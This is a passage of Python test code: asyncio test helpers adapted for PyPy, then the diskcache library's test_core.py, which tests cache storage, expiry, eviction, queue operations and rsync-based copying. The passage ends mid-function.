def add_reader(self, fd, callback, *args):
"""Add a reader callback."""
self._ensure_fd_no_transport(fd)
return self._add_reader(fd, callback, *args)
def remove_reader(self, fd):
"""Remove a reader callback."""
self._ensure_fd_no_transport(fd)
return self._remove_reader(fd)
def add_writer(self, fd, callback, *args):
"""Add a writer callback.."""
self._ensure_fd_no_transport(fd)
return self._add_writer(fd, callback, *args)
def remove_writer(self, fd):
"""Remove a writer callback."""
self._ensure_fd_no_transport(fd)
return self._remove_writer(fd)
def reset_counters(self):
self.remove_reader_count = collections.defaultdict(int)
self.remove_writer_count = collections.defaultdict(int)
def _run_once(self):
super()._run_once()
for when in self._timers:
advance = self._gen.send(when)
self.advance_time(advance)
self._timers = []
def call_at(self, when, callback, *args, context=None):
self._timers.append(when)
return super().call_at(when, callback, *args, context=context)
def _process_events(self, event_list):
return
def _write_to_self(self):
pass
def MockCallback(**kwargs):
return mock.Mock(spec=['__call__'], **kwargs)
class MockPattern(str):
"""A regex based str with a fuzzy __eq__.
Use this helper with 'mock.assert_called_with', or anywhere
where a regex comparison between strings is needed.
For instance:
mock_call.assert_called_with(MockPattern('spam.*ham'))
"""
def __eq__(self, other):
return bool(re.search(str(self), other, re.S))
class MockInstanceOf:
def __init__(self, type):
self._type = type
def __eq__(self, other):
return isinstance(other, self._type)
def get_function_source(func):
source = format_helpers._get_function_source(func)
if source is None:
raise ValueError("unable to get the source of %r" % (func,))
return source
class TestCase(unittest.TestCase):
@staticmethod
def close_loop(loop):
if loop._default_executor is not None:
if not loop.is_closed():
loop.run_until_complete(loop.shutdown_default_executor())
else:
loop._default_executor.shutdown(wait=True)
loop.close()
policy = support.maybe_get_event_loop_policy()
if policy is not None:
try:
watcher = policy.get_child_watcher()
except NotImplementedError:
# watcher is not implemented by EventLoopPolicy, e.g. Windows
pass
else:
if isinstance(watcher, asyncio.ThreadedChildWatcher):
threads = list(watcher._threads.values())
for thread in threads:
thread.join()
def set_event_loop(self, loop, *, cleanup=True):
assert loop is not None
# ensure that the event loop is passed explicitly in asyncio
events.set_event_loop(None)
if cleanup:
self.addCleanup(self.close_loop, loop)
def new_test_loop(self, gen=None):
loop = TestLoop(gen)
self.set_event_loop(loop)
return loop
# PyPy modification: the commented out lines interfere with the fact that
# we are not using the C accelerator module _asyncio. they are removed in
# 3.10
#def unpatch_get_running_loop(self):
# events._get_running_loop = self._get_running_loop
def setUp(self):
#self._get_running_loop = events._get_running_loop
#events._get_running_loop = lambda: None
self._thread_cleanup = support.threading_setup()
def tearDown(self):
#self.unpatch_get_running_loop()
events.set_event_loop(None)
# Detect CPython bug #23353: ensure that yield/yield-from is not used
# in an except block of a generator
self.assertEqual(sys.exc_info(), (None, None, None))
self.doCleanups()
support.threading_cleanup(*self._thread_cleanup)
support.reap_children()
@contextlib.contextmanager
def disable_logger():
"""Context manager to disable asyncio logger.
For example, it can be used to ignore warnings in debug mode.
"""
old_level = logger.level
try:
logger.setLevel(logging.CRITICAL+1)
yield
finally:
logger.setLevel(old_level)
def mock_nonblocking_socket(proto=socket.IPPROTO_TCP, type=socket.SOCK_STREAM,
family=socket.AF_INET):
"""Create a mock of a non-blocking socket."""
sock = mock.MagicMock(socket.socket)
sock.proto = proto
sock.type = type
sock.family = family
sock.gettimeout.return_value = 0.0
return sock
|
test_core.py
|
"Test diskcache.core.Cache."
import collections as co
import errno
import functools as ft
import hashlib
import io
import os
import os.path as op
import pickle
import pytest
import random
import shutil
import sqlite3
import subprocess as sp
import sys
import tempfile
import threading
import time
import unittest
import warnings
from unittest import mock
import diskcache as dc
pytestmark = pytest.mark.filterwarnings('ignore', category=dc.EmptyDirWarning)
@pytest.fixture
def cache():
with dc.Cache() as cache:
yield cache
shutil.rmtree(cache.directory, ignore_errors=True)
def test_init(cache):
for key, value in dc.DEFAULT_SETTINGS.items():
assert getattr(cache, key) == value
cache.check()
cache.close()
cache.close()
def test_init_disk():
with dc.Cache(disk_pickle_protocol=1, disk_min_file_size=2 ** 20) as cache:
key = (None, 0, 'abc')
cache[key] = 0
cache.check()
assert cache.disk_min_file_size == 2 ** 20
assert cache.disk_pickle_protocol == 1
shutil.rmtree(cache.directory, ignore_errors=True)
def test_disk_reset():
with dc.Cache(disk_min_file_size=0, disk_pickle_protocol=0) as cache:
value = (None, 0, 'abc')
cache[0] = value
cache.check()
assert cache.disk_min_file_size == 0
assert cache.disk_pickle_protocol == 0
assert cache._disk.min_file_size == 0
assert cache._disk.pickle_protocol == 0
cache.reset('disk_min_file_size', 2 ** 10)
cache.reset('disk_pickle_protocol', 2)
cache[1] = value
cache.check()
assert cache.disk_min_file_size == 2 ** 10
assert cache.disk_pickle_protocol == 2
assert cache._disk.min_file_size == 2 ** 10
assert cache._disk.pickle_protocol == 2
shutil.rmtree(cache.directory, ignore_errors=True)
def test_disk_valueerror():
with pytest.raises(ValueError):
with dc.Cache(disk=dc.Disk('test')):
pass
def test_custom_disk():
with dc.Cache(disk=dc.JSONDisk, disk_compress_level=6) as cache:
values = [None, True, 0, 1.23, {}, [None] * 10000]
for value in values:
cache[value] = value
for value in values:
assert cache[value] == value
shutil.rmtree(cache.directory, ignore_errors=True)
class SHA256FilenameDisk(dc.Disk):
def filename(self, key=dc.UNKNOWN, value=dc.UNKNOWN):
filename = hashlib.sha256(key).hexdigest()[:32]
full_path = op.join(self._directory, filename)
return filename, full_path
def test_custom_filename_disk():
with dc.Cache(disk=SHA256FilenameDisk) as cache:
for count in range(100, 200):
key = str(count).encode('ascii')
cache[key] = str(count) * int(1e5)
for count in range(100, 200):
key = str(count).encode('ascii')
filename = hashlib.sha256(key).hexdigest()[:32]
full_path = op.join(cache.directory, filename)
with open(full_path) as reader:
content = reader.read()
assert content == str(count) * int(1e5)
shutil.rmtree(cache.directory, ignore_errors=True)
def test_init_makedirs():
cache_dir = tempfile.mkdtemp()
shutil.rmtree(cache_dir)
makedirs = mock.Mock(side_effect=OSError(errno.EACCES))
with pytest.raises(EnvironmentError):
try:
with mock.patch('os.makedirs', makedirs):
cache = dc.Cache(cache_dir)
except EnvironmentError:
shutil.rmtree(cache_dir, ignore_errors=True)
raise
def test_pragma_error(cache):
local = mock.Mock()
con = mock.Mock()
execute = mock.Mock()
cursor = mock.Mock()
fetchall = mock.Mock()
local.pid = os.getpid()
local.con = con
con.execute = execute
execute.return_value = cursor
cursor.fetchall = fetchall
fetchall.side_effect = [sqlite3.OperationalError] * 60000
size = 2 ** 28
with mock.patch('time.sleep', lambda num: 0):
with mock.patch.object(cache, '_local', local):
with pytest.raises(sqlite3.OperationalError):
cache.reset('sqlite_mmap_size', size)
def test_close_error(cache):
class LocalTest(object):
def __init__(self):
self._calls = 0
def __getattr__(self, name):
if self._calls:
raise AttributeError
else:
self._calls += 1
return mock.Mock()
with mock.patch.object(cache, '_local', LocalTest()):
cache.close()
def test_getsetdel(cache):
values = [
(None, False),
((None,) * 2 ** 20, False),
(1234, False),
(2 ** 512, False),
(56.78, False),
(u'hello', False),
(u'hello' * 2 ** 20, False),
(b'world', False),
(b'world' * 2 ** 20, False),
(io.BytesIO(b'world' * 2 ** 20), True),
]
for key, (value, file_like) in enumerate(values):
assert cache.set(key, value, read=file_like)
assert len(cache) == len(values)
for key, (value, file_like) in enumerate(values):
if file_like:
assert cache[key] == value.getvalue()
else:
assert cache[key] == value
for key, _ in enumerate(values):
del cache[key]
assert len(cache) == 0
for value, (key, _) in enumerate(values):
cache[key] = value
assert len(cache) == len(values)
for value, (key, _) in enumerate(values):
assert cache[key] == value
for _, (key, _) in enumerate(values):
del cache[key]
assert len(cache) == 0
cache.check()
def test_get_keyerror1(cache):
with pytest.raises(KeyError):
cache[0]
def test_get_keyerror4(cache):
func = mock.Mock(side_effect=IOError(errno.ENOENT, ''))
cache.reset('statistics', True)
cache[0] = b'abcd' * 2 ** 20
with mock.patch('diskcache.core.open', func):
with pytest.raises((IOError, KeyError, OSError)):
cache[0]
def test_read(cache):
cache.set(0, b'abcd' * 2 ** 20)
with cache.read(0) as reader:
assert reader is not None
def test_read_keyerror(cache):
with pytest.raises(KeyError):
with cache.read(0) as reader:
pass
def test_set_twice(cache):
large_value = b'abcd' * 2 ** 20
cache[0] = 0
cache[0] = 1
assert cache[0] == 1
cache[0] = large_value
assert cache[0] == large_value
with cache.get(0, read=True) as reader:
assert reader.name is not None
cache[0] = 2
assert cache[0] == 2
assert cache.get(0, read=True) == 2
cache.check()
def test_set_timeout(cache):
local = mock.Mock()
con = mock.Mock()
execute = mock.Mock()
local.pid = os.getpid()
local.con = con
con.execute = execute
execute.side_effect = sqlite3.OperationalError
with pytest.raises(dc.Timeout):
try:
with mock.patch.object(cache, '_local', local):
cache.set('a', 'b' * 2 ** 20)
finally:
cache.check()
def test_raw(cache):
assert cache.set(0, io.BytesIO(b'abcd'), read=True)
assert cache[0] == b'abcd'
def test_get(cache):
assert cache.get(0) is None
assert cache.get(1, 'dne') == 'dne'
assert cache.get(2, {}) == {}
assert cache.get(0, expire_time=True, tag=True) == (None, None, None)
assert cache.set(0, 0, expire=None, tag=u'number')
assert cache.get(0, expire_time=True) == (0, None)
assert cache.get(0, tag=True) == (0, u'number')
assert cache.get(0, expire_time=True, tag=True) == (0, None, u'number')
def test_get_expired_fast_path(cache):
assert cache.set(0, 0, expire=0.001)
time.sleep(0.01)
assert cache.get(0) is None
def test_get_ioerror_fast_path(cache):
assert cache.set(0, 0)
disk = mock.Mock()
put = mock.Mock()
fetch = mock.Mock()
disk.put = put
put.side_effect = [(0, True)]
disk.fetch = fetch
io_error = IOError()
io_error.errno = errno.ENOENT
fetch.side_effect = io_error
with mock.patch.object(cache, '_disk', disk):
assert cache.get(0) is None
def test_get_expired_slow_path(cache):
cache.stats(enable=True)
cache.reset('eviction_policy', 'least-recently-used')
assert cache.set(0, 0, expire=0.001)
time.sleep(0.01)
assert cache.get(0) is None
def test_get_ioerror_slow_path(cache):
cache.reset('eviction_policy', 'least-recently-used')
cache.set(0, 0)
disk = mock.Mock()
put = mock.Mock()
fetch = mock.Mock()
disk.put = put
put.side_effect = [(0, True)]
disk.fetch = fetch
io_error = IOError()
io_error.errno = errno.EACCES
fetch.side_effect = io_error
with mock.patch.object(cache, '_disk', disk):
with pytest.raises(IOError):
cache.get(0)
def test_pop(cache):
assert cache.incr('alpha') == 1
assert cache.pop('alpha') == 1
assert cache.get('alpha') is None
assert cache.check() == []
assert cache.set('alpha', 123, expire=1, tag='blue')
assert cache.pop('alpha', tag=True) == (123, 'blue')
assert cache.set('beta', 456, expire=1e-9, tag='green')
time.sleep(0.01)
assert cache.pop('beta', 'dne') == 'dne'
assert cache.set('gamma', 789, tag='red')
assert cache.pop('gamma', expire_time=True, tag=True) == (789, None, 'red')
assert cache.pop('dne') is None
assert cache.set('delta', 210)
assert cache.pop('delta', expire_time=True) == (210, None)
assert cache.set('epsilon', '0' * 2 ** 20)
assert cache.pop('epsilon') == '0' * 2 ** 20
def test_pop_ioerror(cache):
assert cache.set(0, 0)
disk = mock.Mock()
put = mock.Mock()
fetch = mock.Mock()
disk.put = put
put.side_effect = [(0, True)]
disk.fetch = fetch
io_error = IOError()
io_error.errno = errno.ENOENT
fetch.side_effect = io_error
with mock.patch.object(cache, '_disk', disk):
assert cache.pop(0) is None
def test_pop_ioerror_eacces(cache):
assert cache.set(0, 0)
disk = mock.Mock()
put = mock.Mock()
fetch = mock.Mock()
disk.put = put
put.side_effect = [(0, True)]
disk.fetch = fetch
io_error = IOError()
io_error.errno = errno.EACCES
fetch.side_effect = io_error
with mock.patch.object(cache, '_disk', disk):
with pytest.raises(IOError):
cache.pop(0)
def test_delete(cache):
cache[0] = 0
assert cache.delete(0)
assert len(cache) == 0
assert not cache.delete(0)
assert len(cache.check()) == 0
def test_del(cache):
with pytest.raises(KeyError):
del cache[0]
def test_del_expired(cache):
cache.set(0, 0, expire=0.001)
time.sleep(0.01)
with pytest.raises(KeyError):
del cache[0]
def test_stats(cache):
cache[0] = 0
assert cache.stats(enable=True) == (0, 0)
for _ in range(100):
cache[0]
for _ in range(10):
cache.get(1)
assert cache.stats(reset=True) == (100, 10)
assert cache.stats(enable=False) == (0, 0)
for _ in range(100):
cache[0]
for _ in range(10):
cache.get(1)
assert cache.stats() == (0, 0)
assert len(cache.check()) == 0
def test_path(cache):
cache[0] = u'abc'
large_value = b'abc' * 2 ** 20
cache[1] = large_value
assert cache.get(0, read=True) == u'abc'
with cache.get(1, read=True) as reader:
assert reader.name is not None
path = reader.name
with open(path, 'rb') as reader:
value = reader.read()
assert value == large_value
assert len(cache.check()) == 0
def test_expire_rows(cache):
cache.reset('cull_limit', 0)
for value in range(10):
assert cache.set(value, value, expire=1e-9)
for value in range(10, 15):
assert cache.set(value, value)
assert len(cache) == 15
time.sleep(0.01)
cache.reset('cull_limit', 10)
assert cache.set(15, 15)
assert len(cache) == 6
assert len(cache.check()) == 0
def test_least_recently_stored(cache):
cache.reset('eviction_policy', u'least-recently-stored')
cache.reset('size_limit', int(10.1e6))
cache.reset('cull_limit', 2)
million = b'x' * int(1e6)
for value in range(10):
cache[value] = million
assert len(cache) == 10
for value in range(10):
assert cache[value] == million
for value in range(10, 20):
cache[value] = million
assert len(cache) == 10
for value in range(10):
cache[value] = million
count = len(cache)
for index, length in enumerate([1, 2, 3, 4]):
cache[10 + index] = million * length
assert len(cache) == count - length
assert cache[12] == million * 3
assert cache[13] == million * 4
assert len(cache.check()) == 0
def test_least_recently_used(cache):
cache.reset('eviction_policy', u'least-recently-used')
cache.reset('size_limit', int(10.1e6))
cache.reset('cull_limit', 5)
million = b'x' * int(1e6)
for value in range(10):
cache[value] = million
assert len(cache) == 10
time.sleep(0.01)
cache[0]
cache[1]
cache[7]
cache[8]
cache[9]
cache[10] = million
assert len(cache) == 6
for value in [0, 1, 7, 8, 9, 10]:
assert cache[value] == million
assert len(cache.check()) == 0
def test_least_frequently_used(cache):
cache.reset('eviction_policy', u'least-frequently-used')
cache.reset('size_limit', int(10.1e6))
cache.reset('cull_limit', 5)
million = b'x' * int(1e6)
for value in range(10):
cache[value] = million
assert len(cache) == 10
cache[0], cache[0], cache[0], cache[0], cache[0]
cache[1], cache[1], cache[1], cache[1]
cache[7], cache[7], cache[7]
cache[8], cache[8]
cache[9]
cache[10] = million
assert len(cache) == 6
for value in [0, 1, 7, 8, 9, 10]:
assert cache[value] == million
assert len(cache.check()) == 0
def test_filename_error(cache):
func = mock.Mock(side_effect=OSError(errno.EACCES))
with mock.patch('os.makedirs', func):
with pytest.raises(OSError):
cache._disk.filename()
def test_remove_error(cache):
func = mock.Mock(side_effect=OSError(errno.EACCES))
try:
with mock.patch('os.remove', func):
cache._disk.remove('ab/cd/efg.val')
except OSError:
pass
else:
if os.name == 'nt':
pass # File delete errors ignored on Windows.
else:
raise Exception('test_remove_error failed')
def test_check(cache):
blob = b'a' * 2 ** 20
keys = (0, 1, 1234, 56.78, u'hello', b'world', None)
for key in keys:
cache[key] = blob
# Cause mayhem.
with cache.get(0, read=True) as reader:
full_path = reader.name
os.rename(full_path, full_path + '_moved')
with cache.get(1, read=True) as reader:
full_path = reader.name
os.remove(full_path)
cache._sql('UPDATE Cache SET size = 0 WHERE rowid > 1')
cache.reset('count', 0)
cache.reset('size', 0)
with warnings.catch_warnings():
warnings.filterwarnings('ignore')
cache.check()
cache.check(fix=True)
assert len(cache.check()) == 0 # Should display no warnings.
def test_integrity_check(cache):
for value in range(1000):
cache[value] = value
cache.close()
with io.open(op.join(cache.directory, 'cache.db'), 'r+b') as writer:
writer.seek(52)
writer.write(b'\x00\x01') # Should be 0, change it.
cache = dc.Cache(cache.directory)
with warnings.catch_warnings():
warnings.filterwarnings('ignore')
cache.check()
cache.check(fix=True)
assert len(cache.check()) == 0
def test_expire(cache):
cache.reset('cull_limit', 0) # Disable expiring keys on `set`.
now = time.time()
time_time = mock.Mock(return_value=now)
with mock.patch('time.time', time_time):
for value in range(1, 101):
assert cache.set(value, value, expire=value)
assert len(cache) == 100
time_time = mock.Mock(return_value=now + 11)
cache.reset('cull_limit', 10)
with mock.patch('time.time', time_time):
assert cache.expire() == 10
assert len(cache) == 90
assert len(cache.check()) == 0
def test_tag_index():
with dc.Cache(tag_index=True) as cache:
assert cache.tag_index == 1
shutil.rmtree(cache.directory, ignore_errors=True)
def test_evict(cache):
colors = ('red', 'blue', 'yellow')
for value in range(90):
assert cache.set(value, value, tag=colors[value % len(colors)])
assert len(cache) == 90
assert cache.evict('red') == 30
assert len(cache) == 60
assert len(cache.check()) == 0
def test_clear(cache):
for value in range(100):
cache[value] = value
assert len(cache) == 100
assert cache.clear() == 100
assert len(cache) == 0
assert len(cache.check()) == 0
def test_clear_timeout(cache):
transact = mock.Mock()
transact.side_effect = dc.Timeout
with mock.patch.object(cache, '_transact', transact):
with pytest.raises(dc.Timeout):
cache.clear()
def test_tag(cache):
assert cache.set(0, None, tag=u'zero')
assert cache.set(1, None, tag=1234)
assert cache.set(2, None, tag=5.67)
assert cache.set(3, None, tag=b'three')
assert cache.get(0, tag=True) == (None, u'zero')
assert cache.get(1, tag=True) == (None, 1234)
assert cache.get(2, tag=True) == (None, 5.67)
assert cache.get(3, tag=True) == (None, b'three')
def test_with(cache):
with dc.Cache(cache.directory) as tmp:
tmp[u'a'] = 0
tmp[u'b'] = 1
assert cache[u'a'] == 0
assert cache[u'b'] == 1
def test_contains(cache):
assert 0 not in cache
cache[0] = 0
assert 0 in cache
def test_touch(cache):
assert cache.set(0, None, expire=60)
assert cache.touch(0, expire=None)
assert cache.touch(0, expire=0)
assert not cache.touch(0)
def test_add(cache):
assert cache.add(1, 1)
assert cache.get(1) == 1
assert not cache.add(1, 2)
assert cache.get(1) == 1
assert cache.delete(1)
assert cache.add(1, 1, expire=0.001)
time.sleep(0.01)
assert cache.add(1, 1)
cache.check()
def test_add_large_value(cache):
value = b'abcd' * 2 ** 20
assert cache.add(b'test-key', value)
assert cache.get(b'test-key') == value
assert not cache.add(b'test-key', value * 2)
assert cache.get(b'test-key') == value
cache.check()
def test_add_timeout(cache):
local = mock.Mock()
con = mock.Mock()
execute = mock.Mock()
local.pid = os.getpid()
local.con = con
con.execute = execute
execute.side_effect = sqlite3.OperationalError
with pytest.raises(dc.Timeout):
try:
with mock.patch.object(cache, '_local', local):
cache.add(0, 0)
finally:
cache.check()
def test_incr(cache):
assert cache.incr('key', default=5) == 6
assert cache.incr('key', 2) == 8
assert cache.get('key', expire_time=True, tag=True) == (8, None, None)
assert cache.delete('key')
assert cache.set('key', 100, expire=0.100)
assert cache.get('key') == 100
time.sleep(0.120)
assert cache.incr('key') == 1
def test_incr_insert_keyerror(cache):
with pytest.raises(KeyError):
cache.incr('key', default=None)
def test_incr_update_keyerror(cache):
assert cache.set('key', 100, expire=0.100)
assert cache.get('key') == 100
time.sleep(0.120)
with pytest.raises(KeyError):
cache.incr('key', default=None)
def test_decr(cache):
assert cache.decr('key', default=5) == 4
assert cache.decr('key', 2) == 2
assert cache.get('key', expire_time=True, tag=True) == (2, None, None)
assert cache.delete('key')
assert cache.set('key', 100, expire=0.100)
assert cache.get('key') == 100
time.sleep(0.120)
assert cache.decr('key') == -1
def test_iter(cache):
sequence = list('abcdef') + [('g',)]
for index, value in enumerate(sequence):
cache[value] = index
iterator = iter(cache)
assert all(one == two for one, two in zip(sequence, iterator))
cache['h'] = 7
with pytest.raises(StopIteration):
next(iterator)
def test_iter_expire(cache):
cache.reset('cull_limit', 0)
for num in range(100):
cache.set(num, num, expire=1e-9)
assert len(cache) == 100
assert list(cache) == list(range(100))
def test_iter_error(cache):
with pytest.raises(StopIteration):
next(iter(cache))
def test_reversed(cache):
sequence = 'abcdef'
for index, value in enumerate(sequence):
cache[value] = index
iterator = reversed(cache)
pairs = zip(reversed(sequence), iterator)
assert all(one == two for one, two in pairs)
try:
next(iterator)
except StopIteration:
pass
else:
assert False, 'StopIteration expected'
def test_reversed_error(cache):
with pytest.raises(StopIteration):
next(reversed(cache))
def test_push_pull(cache):
for value in range(10):
cache.push(value)
for value in range(10):
_, pull_value = cache.pull()
assert pull_value == value
assert len(cache) == 0
def test_push_pull_prefix(cache):
for value in range(10):
cache.push(value, prefix='key')
for value in range(10):
key, peek_value = cache.peek(prefix='key')
key, pull_value = cache.pull(prefix='key')
assert key.startswith('key')
assert peek_value == value
assert pull_value == value
assert len(cache) == 0
assert len(cache.check()) == 0
def test_push_pull_extras(cache):
cache.push('test')
assert cache.pull() == (500000000000000, 'test')
assert len(cache) == 0
cache.push('test', expire=10)
(key, value), expire_time = cache.peek(expire_time=True)
assert key == 500000000000000
assert value == 'test'
assert expire_time > time.time()
assert len(cache) == 1
(key, value), expire_time = cache.pull(expire_time=True)
assert key == 500000000000000
assert value == 'test'
assert expire_time > time.time()
assert len(cache) == 0
cache.push('test', tag='foo')
(key, value), tag = cache.peek(tag=True)
assert key == 500000000000000
assert value == 'test'
assert tag == 'foo'
assert len(cache) == 1
(key, value), tag = cache.pull(tag=True)
assert key == 500000000000000
assert value == 'test'
assert tag == 'foo'
assert len(cache) == 0
cache.push('test')
(key, value), expire_time, tag = cache.peek(expire_time=True, tag=True)
assert key == 500000000000000
assert value == 'test'
assert expire_time is None
assert tag is None
assert len(cache) == 1
(key, value), expire_time, tag = cache.pull(expire_time=True, tag=True)
assert key == 500000000000000
assert value == 'test'
assert expire_time is None
assert tag is None
assert len(cache) == 0
assert cache.pull(default=(0, 1)) == (0, 1)
assert len(cache.check()) == 0
def test_push_pull_expire(cache):
cache.push(0, expire=0.1)
cache.push(0, expire=0.1)
cache.push(0, expire=0.1)
cache.push(1)
time.sleep(0.2)
assert cache.pull() == (500000000000003, 1)
assert len(cache) == 0
assert len(cache.check()) == 0
def test_push_peek_expire(cache):
cache.push(0, expire=0.1)
cache.push(0, expire=0.1)
cache.push(0, expire=0.1)
cache.push(1)
time.sleep(0.2)
assert cache.peek() == (500000000000003, 1)
assert len(cache) == 1
assert len(cache.check()) == 0
def test_push_pull_large_value(cache):
value = b'test' * (2 ** 20)
cache.push(value)
assert cache.pull() == (500000000000000, value)
assert len(cache) == 0
assert len(cache.check()) == 0
def test_push_peek_large_value(cache):
value = b'test' * (2 ** 20)
cache.push(value)
assert cache.peek() == (500000000000000, value)
assert len(cache) == 1
assert len(cache.check()) == 0
def test_pull_ioerror(cache):
assert cache.push(0) == 500000000000000
disk = mock.Mock()
put = mock.Mock()
fetch = mock.Mock()
disk.put = put
put.side_effect = [(0, True)]
disk.fetch = fetch
io_error = IOError()
io_error.errno = errno.ENOENT
fetch.side_effect = io_error
with mock.patch.object(cache, '_disk', disk):
assert cache.pull() == (None, None)
def test_peek_ioerror(cache):
assert cache.push(0) == 500000000000000
disk = mock.Mock()
put = mock.Mock()
fetch = mock.Mock()
disk.put = put
put.side_effect = [(0, True)]
disk.fetch = fetch
io_error = IOError()
io_error.errno = errno.ENOENT
fetch.side_effect = [io_error, 0]
with mock.patch.object(cache, '_disk', disk):
_, value = cache.peek()
assert value == 0
def test_pull_ioerror_eacces(cache):
assert cache.push(0) == 500000000000000
disk = mock.Mock()
put = mock.Mock()
fetch = mock.Mock()
disk.put = put
put.side_effect = [(0, True)]
disk.fetch = fetch
io_error = IOError()
io_error.errno = errno.EACCES
fetch.side_effect = io_error
with mock.patch.object(cache, '_disk', disk):
with pytest.raises(IOError):
cache.pull()
def test_peek_ioerror_eacces(cache):
assert cache.push(0) == 500000000000000
disk = mock.Mock()
put = mock.Mock()
fetch = mock.Mock()
disk.put = put
put.side_effect = [(0, True)]
disk.fetch = fetch
io_error = IOError()
io_error.errno = errno.EACCES
fetch.side_effect = io_error
with mock.patch.object(cache, '_disk', disk):
with pytest.raises(IOError):
cache.peek()
def test_peekitem_extras(cache):
with pytest.raises(KeyError):
cache.peekitem()
assert cache.set('a', 0)
assert cache.set('b', 1)
assert cache.set('c', 2, expire=10, tag='foo')
assert cache.set('d', 3, expire=0.1)
assert cache.set('e', 4, expire=0.1)
time.sleep(0.2)
(key, value), expire_time, tag = cache.peekitem(expire_time=True, tag=True)
assert key == 'c'
assert value == 2
assert expire_time > 0
assert tag == 'foo'
(key, value), expire_time = cache.peekitem(expire_time=True)
assert key == 'c'
assert value == 2
assert expire_time > 0
(key, value), tag = cache.peekitem(tag=True)
assert key == 'c'
assert value == 2
assert expire_time > 0
assert tag == 'foo'
def test_peekitem_ioerror(cache):
assert cache.set('a', 0)
assert cache.set('b', 1)
assert cache.set('c', 2)
disk = mock.Mock()
put = mock.Mock()
fetch = mock.Mock()
disk.put = put
put.side_effect = [(0, True)]
disk.fetch = fetch
io_error = IOError()
io_error.errno = errno.ENOENT
fetch.side_effect = [io_error, 2]
with mock.patch.object(cache, '_disk', disk):
_, value = cache.peekitem()
assert value == 2
def test_peekitem_ioerror_eacces(cache):
assert cache.set('a', 0)
assert cache.set('b', 1)
assert cache.set('c', 2)
disk = mock.Mock()
put = mock.Mock()
fetch = mock.Mock()
disk.put = put
put.side_effect = [(0, True)]
disk.fetch = fetch
io_error = IOError()
io_error.errno = errno.EACCES
fetch.side_effect = io_error
with mock.patch.object(cache, '_disk', disk):
with pytest.raises(IOError):
cache.peekitem()
def test_iterkeys(cache):
assert list(cache.iterkeys()) == []
def test_pickle(cache):
for num, val in enumerate('abcde'):
cache[val] = num
data = pickle.dumps(cache)
other = pickle.loads(data)
for key in other:
assert other[key] == cache[key]
def test_pragmas(cache):
results = []
def compare_pragmas():
valid = True
for key, value in dc.DEFAULT_SETTINGS.items():
if not key.startswith('sqlite_'):
continue
pragma = key[7:]
result = cache._sql('PRAGMA %s' % pragma).fetchall()
if result == [(value,)]:
continue
args = pragma, result, [(value,)]
print('pragma %s mismatch: %r != %r' % args)
valid = False
results.append(valid)
threads = []
for count in range(8):
thread = threading.Thread(target=compare_pragmas)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
assert all(results)
def test_size_limit_with_files(cache):
cache.reset('cull_limit', 0)
size_limit = 30 * cache.disk_min_file_size
cache.reset('size_limit', size_limit)
value = b'foo' * cache.disk_min_file_size
for key in range(40):
cache.set(key, value)
assert cache.volume() > size_limit
cache.cull()
assert cache.volume() <= size_limit
def test_size_limit_with_database(cache):
cache.reset('cull_limit', 0)
size_limit = 2 * cache.disk_min_file_size
cache.reset('size_limit', size_limit)
value = b'0123456789' * 10
count = size_limit // (8 + len(value))
for key in range(count):
cache.set(key, value)
assert cache.volume() > size_limit
cache.cull()
assert cache.volume() <= size_limit
def test_cull_eviction_policy_none(cache):
cache.reset('eviction_policy', 'none')
size_limit = 2 * cache.disk_min_file_size
cache.reset('size_limit', size_limit)
value = b'0123456789' * 10
count = size_limit // (8 + len(value))
for key in range(count):
cache.set(key, value)
assert cache.volume() > size_limit
cache.cull()
assert cache.volume() > size_limit
def test_cull_size_limit_0(cache):
cache.reset('cull_limit', 0)
size_limit = 2 * cache.disk_min_file_size
cache.reset('size_limit', 0)
value = b'0123456789' * 10
count = size_limit // (8 + len(value))
for key in range(count):
cache.set(key, value)
assert cache.volume() > size_limit
cache.cull()
assert cache.volume() <= size_limit
def test_cull_timeout(cache):
transact = mock.Mock()
transact.side_effect = [dc.Timeout]
with mock.patch.object(cache, 'expire', lambda now: 0):
with mock.patch.object(cache, 'volume', lambda: int(1e12)):
with mock.patch.object(cache, '_transact', transact):
with pytest.raises(dc.Timeout):
cache.cull()
def test_key_roundtrip(cache):
key_part_0 = u"part0"
key_part_1 = u"part1"
to_test = [
(key_part_0, key_part_1),
[key_part_0, key_part_1],
]
for key in to_test:
cache.clear()
cache[key] = {'example0': ['value0']}
keys = list(cache)
assert len(keys) == 1
cache_key = keys[0]
assert cache[key] == {'example0': ['value0']}
assert cache[cache_key] == {'example0': ['value0']}
def test_constant():
import diskcache.core
assert repr(diskcache.core.ENOVAL) == 'ENOVAL'
def test_copy():
cache_dir1 = tempfile.mkdtemp()
with dc.Cache(cache_dir1) as cache1:
for count in range(10):
cache1[count] = str(count)
for count in range(10, 20):
cache1[count] = str(count) * int(1e5)
cache_dir2 = tempfile.mkdtemp()
shutil.rmtree(cache_dir2)
shutil.copytree(cache_dir1, cache_dir2)
with dc.Cache(cache_dir2) as cache2:
for count in range(10):
assert cache2[count] == str(count)
for count in range(10, 20):
assert cache2[count] == str(count) * int(1e5)
shutil.rmtree(cache_dir1, ignore_errors=True)
shutil.rmtree(cache_dir2, ignore_errors=True)
def run(command):
print('run$ %r' % command)
try:
result = sp.check_output(command, stderr=sp.STDOUT)
print(result)
except sp.CalledProcessError as exc:
print(exc.output)
raise
def test_rsync():
try:
run(['rsync', '--version'])
except OSError:
return # No rsync installed. Skip test.
rsync_args = ['rsync', '-a', '--checksum', '--delete', '--stats']
cache_dir1 = tempfile.mkdtemp() + os.sep
cache_dir2 = tempfile.mkdtemp() + os.sep
# Store some items in cache_dir1.
with dc.Cache(cache_dir1) as cache1:
for count in range(100):
cache1[count] = str(count)
for count in range(100, 200):
cache1[count] = str(count) * int(1e5)
# Rsync cache_dir1 to cache_dir2.
run(rsync_args + [cache_dir1, cache_dir2])
# Validate items in cache_dir2.
with dc.Cache(cache_dir2) as cache2:
for count in range(100):
assert cache2[count] == str(count)
for count in range(100, 200):
assert cache2[count] == str(count) * int(1e5)
# Store more items in cache_dir2.
with dc.Cache(cache_dir2) as cache2:
for count in range(200, 300):
cache2[count] = str(count)
for count in range(300, 400):
cache2[count] = str(count) * int(1e5)
# Rsync cache_dir2 to cache_dir1.
run(rsync_args + [cache_dir2, cache_dir1])
# Validate items in cache_dir1.
with dc.Cache(cache_dir1) as cache1:
for count in range(100):
assert cache1[count] == str(count)
for count in range(100, 200):
assert cache1[count] == str(count) * int(1e5)
for count in range(200, 300):
assert cache1[count] == str(count)
for count in range(300, 400):
